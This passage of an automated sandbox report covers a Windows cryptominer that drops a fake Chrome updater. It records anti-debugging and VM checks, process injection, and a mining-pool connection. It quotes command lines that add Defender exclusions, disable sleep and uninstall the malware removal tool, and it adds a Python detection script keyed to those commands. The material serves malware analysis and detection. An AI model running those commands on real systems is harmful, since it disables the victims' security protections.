                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3713
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6536
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3081
                Source: C:\ProgramData\Google\Chrome\updater.exe Dropped PE file which has not been started: C:\Windows\Temp\mnidgyzvuran.sys
                Source: C:\Windows\System32\conhost.exe API coverage: 1.1 %
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe TID: 2276 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176 Thread sleep count: 6033 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176 Thread sleep count: 3713 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6156 Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep count: 6536 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep count: 3081 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684 Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\System32\wusa.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\wusa.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: TwrhjEKqxk.exe, 00000000.00000002.2149228752.000002394559C000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000022.00000002.2192066707.000002166E533000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe System information queried: ModuleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe Thread information set: HideFromDebugger
                Source: C:\ProgramData\Google\Chrome\updater.exe Thread information set: HideFromDebugger
                Source: C:\ProgramData\Google\Chrome\updater.exe Open window title or class name: regmonclass
                Source: C:\ProgramData\Google\Chrome\updater.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\ProgramData\Google\Chrome\updater.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\ProgramData\Google\Chrome\updater.exe Open window title or class name: procmon_window_class
                Source: C:\ProgramData\Google\Chrome\updater.exe Open window title or class name: filemonclass
                Source: C:\ProgramData\Google\Chrome\updater.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe Process queried: DebugObjectHandle
                Source: C:\ProgramData\Google\Chrome\updater.exe Process queried: DebugPort
                Source: C:\ProgramData\Google\Chrome\updater.exe Process queried: DebugObjectHandle
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\System32\conhost.exe Code function: 57_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,57_2_0000000140001160

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\explorer.exe Network Connect: 162.19.224.121 10343
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtQueryInformationProcess: Indirect: 0x7FF7A0307C13Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtSetInformationThread: Indirect: 0x7FF7DA4D9F83Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtQuerySystemInformation: Indirect: 0x7FF7DA4A49B3Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtQuerySystemInformation: Indirect: 0x7FF7A02D49B3Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtSetInformationThread: Indirect: 0x7FF7A0309F83Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF7DA4D7C13Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF7DA4D2A27Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtQueryInformationProcess: Indirect: 0x7FF7A0302A27Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140000000 value: 4DJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140001000 value: 40Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140360000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 1404C8000 value: 20Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 1407FB000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 14081B000 value: 48Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 14081C000 value: 48Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 14081F000 value: 48Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140821000 value: CEJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140822000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140823000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: E05010 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 3924Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 6476Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | File written: C:\Windows\System32\drivers\etc\hosts
                Source: explorer.exe, 0000003B.00000002.4507932158.000000000118B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3450981482.000000000118B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3455732811.000000000118B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
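
                The two sections above record three command lines that a detection engineer can key on directly: an Add-MpPreference call that excludes the whole user profile, ProgramData and every .exe from Defender scanning, powercfg calls that set the AC standby and hibernate timeouts to 0 so the miner is never suspended, and wusa /uninstall /kb:890830, which removes the Malicious Software Removal Tool package. The following is an added example, not code from Joe Sandbox or from the sample: it scores process-creation events (dicts shaped like Sysmon event 1 fields Image, ParentImage and CommandLine) against those three patterns, decoding a PowerShell -EncodedCommand payload first so an encoded variant of the same cmdlet is not missed. The rule weights, the field names and every sample event (including the encoded one attributed to updater.exe) are constructed for the demonstration and are not taken from the report.

```python
"""Detection logic for the defense-evasion command lines recorded in this report.

Added example: not Joe Sandbox code and not part of the analysed sample. It scores
process-creation events (Sysmon event 1 / Security 4688 style dicts) for the three
command-line patterns the report lists, after decoding any PowerShell
-EncodedCommand payload so an encoded variant of the same cmdlet is not missed.
All events below are constructed for the demonstration, not taken from the run.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# powershell.exe accepts -e, -ec and every prefix of -EncodedCommand (assumption:
# the payload is a single base64 token, which is how the parameter is normally used).
_ENC_ALIASES = ["e", "ec"] + ["encodedcommand"[:i] for i in range(2, 15)]
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:%s)\s+([A-Za-z0-9+/=]+)"
    % "|".join(sorted(set(_ENC_ALIASES), key=len, reverse=True))
)


def decode_encoded_command(cmdline: str) -> str:
    """Replace a -EncodedCommand payload with its decoded UTF-16LE text, else return unchanged."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64 / not UTF-16LE: keep as observed
        return cmdline
    return cmdline[: m.start(1)] + decoded + cmdline[m.end(1) :]


@dataclass(frozen=True)
class Rule:
    name: str
    image: str            # lower-case basename the event's Image must have
    pattern: re.Pattern   # searched in the decoded command line
    weight: int           # rough severity, an assumption to tune per environment


RULES = (
    # Add-/Set-MpPreference with an exclusion parameter (the report's command excludes
    # the user profile, ProgramData and every .exe from Defender).
    Rule("defender_exclusion_added", "powershell.exe",
         re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Extension|Process)"), 60),
    # powercfg /x|-x|/change|-change <standby|hibernate|monitor>-timeout-<ac|dc> 0 ("never").
    Rule("sleep_hibernate_disabled", "powercfg.exe",
         re.compile(r"(?i)[/-](?:x|change)\s+-?(?:standby|hibernate|monitor)-timeout-(?:ac|dc)\s+0\b"), 30),
    # wusa /uninstall /kb:890830 removes the Malicious Software Removal Tool package.
    Rule("msrt_uninstalled", "wusa.exe",
         re.compile(r"(?i)/uninstall\b.*/kb:890830\b"), 50),
)


def image_name(image: str) -> str:
    """Basename of an image path, lower-cased, tolerating either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Names of the rules one process-creation event matches."""
    name = image_name(event.get("Image", ""))
    cmd = decode_encoded_command(event.get("CommandLine", ""))
    return [r.name for r in RULES if name == r.image and r.pattern.search(cmd)]


def score_by_parent(events: list[dict]) -> dict[str, dict]:
    """Aggregate matches per parent process; each rule counts once per parent."""
    out: dict[str, dict] = {}
    for ev in events:
        for hit in evaluate(ev):
            entry = out.setdefault(ev.get("ParentImage", "?"), {"score": 0, "rules": set()})
            if hit not in entry["rules"]:
                entry["rules"].add(hit)
                entry["score"] += next(r.weight for r in RULES if r.name == hit)
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = r"C:\Users\user\Desktop\TwrhjEKqxk.exe"
# Constructed encoded variant of the same cmdlet; attributing it to updater.exe is an assumption.
ENCODED_PAYLOAD = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\ProgramData'".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed, shaped like Sysmon event 1 fields
    {"Image": PS, "ParentImage": SAMPLE,
     "CommandLine": PS + " Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"},
    {"Image": r"C:\Windows\System32\powercfg.exe", "ParentImage": SAMPLE,
     "CommandLine": r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"},
    {"Image": r"C:\Windows\System32\powercfg.exe", "ParentImage": SAMPLE,
     "CommandLine": r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"},
    {"Image": r"C:\Windows\System32\wusa.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wusa /uninstall /kb:890830 /quiet /norestart"},
    {"Image": PS, "ParentImage": r"C:\ProgramData\Google\Chrome\updater.exe",
     "CommandLine": "powershell.exe -NoProfile -enc " + ENCODED_PAYLOAD},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",          # benign: read-only query
     "CommandLine": "powershell.exe Get-MpPreference"},
    {"Image": r"C:\Windows\System32\powercfg.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powercfg /x -monitor-timeout-ac 15"},            # benign: non-zero timeout
]

if __name__ == "__main__":
    for parent, info in score_by_parent(SAMPLE_EVENTS).items():
        print(f"{info['score']:3d}  {parent}  {sorted(info['rules'])}")
```

                Grouping by parent is what makes this useful: a single powercfg timeout of 0 is also what an administrator sets on a kiosk or build server, which is why that rule carries the lowest weight, while a parent living in a user-writable path that both adds Defender exclusions and disables sleep, as the sample here does, reaches a score worth alerting on. The hosts-file write the report also records is a file event rather than a process creation and is not covered by these rules.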
                MITRE ATT&CK matrix (one column per tactic; digits in brackets are the counts the report shows next to matched techniques):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation [31] | Windows Service [11] | Windows Service [11] | Masquerading [1] | OS Credential Dumping | Security Software Discovery [751] | Remote Services | Archive Collected Data [1] | Encrypted Channel [1] | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Service Execution [1] | DLL Side-Loading [1] | Process Injection [311] | File and Directory Permissions Modification [1] | LSASS Memory | Process Discovery [1] | Remote Desktop Protocol | Data from Removable Media | Non-Standard Port [1] | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Abuse Elevation Control Mechanism [1] | Disable or Modify Tools [1] | Security Account Manager | Virtualization/Sandbox Evasion [361] | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol [1] | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading [1] | Virtualization/Sandbox Evasion [361] | NTDS | Application Window Discovery [1] | Distributed Component Object Model | Input Capture | Application Layer Protocol [1] | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Process Injection [311] | LSA Secrets | Remote System Discovery [1] | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism [1] | Cached Domain Credentials | System Information Discovery [34] | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information [2] | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing [2] | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | DLL Side-Loading [1] | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | File Deletion [1] | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1527556 | Sample: TwrhjEKqxk.exe | Start date: 07/10/2024 | Architecture: WINDOWS | Score: 100

                Start node
                  DNS: xmr-eu1.nanopool.org (DNS related to crypt mining pools)
                  Signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 7 other signatures
                  Started: updater.exe [1]; TwrhjEKqxk.exe [1 3]; svchost.exe

                updater.exe
                  Dropped: C:\Windows\Temp\mnidgyzvuran.sys, PE32+
                  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Query firmware table information (likely to detect VMs); 10 other signatures
                  Started: explorer.exe; powershell.exe [23] -> conhost.exe; cmd.exe [1] -> 2 other processes; 10 other processes -> 9 other processes

                TwrhjEKqxk.exe
                  Dropped: C:\ProgramData\Google\Chrome\updater.exe, PE32+; C:\Windows\System32\drivers\etc\hosts, ASCII
